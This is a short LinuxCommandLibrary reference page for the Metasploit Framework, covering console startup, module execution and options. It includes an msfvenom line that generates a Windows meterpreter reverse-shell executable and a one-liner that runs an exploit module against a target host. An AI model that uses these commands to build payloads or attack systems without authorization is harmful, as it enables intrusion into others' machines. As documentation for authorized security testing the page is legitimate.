LinuxCommandLibrary

metasploit

penetration testing platform for developing, testing, and executing exploits

TLDR

Start Metasploit console

$ msfconsole
copy
Start without banner
$ msfconsole -q
copy
Execute resource script
$ msfconsole -r [script.rc]
copy
Database initialization
$ msfdb init
copy
Run specific module
$ msfconsole -x "use [exploit/module]; set RHOSTS [target]; run"
copy
Generate payload
$ msfvenom -p [windows/meterpreter/reverse_tcp] LHOST=[ip] LPORT=[port] -f [exe] > [payload.exe]
copy

SYNOPSIS

msfconsole [options]

DESCRIPTION

Metasploit Framework is a penetration testing platform for developing, testing, and executing exploits. It includes a large database of public exploits and payloads for security testing.
The framework includes msfconsole (interactive shell), msfvenom (payload generator), and auxiliary tools.

PARAMETERS

-q, --quiet

Don't print banner.
-r file
Resource script file.
-x cmd
Execute command.
-o file
Output file.
-e encoder
Encoder to use.

COMMON COMMANDS

$ search <term>     - Search modules
use <module>      - Select module
info              - Module details
set <opt> <val>   - Set option
run               - Execute
copy

CAVEATS

Requires authorization for use. Database setup recommended. Regular updates needed. Antivirus may flag payloads.

HISTORY

Metasploit was created by H.D. Moore in 2003 as a portable network tool. It was acquired by Rapid7 in 2009 and remains the most popular penetration testing framework.

SEE ALSO

nmap(1), burpsuite(1), sqlmap(1), hydra(1)

> TERMINAL_GEAR

Curated for the Linux community

Copied to clipboard

> TERMINAL_GEAR

Curated for the Linux community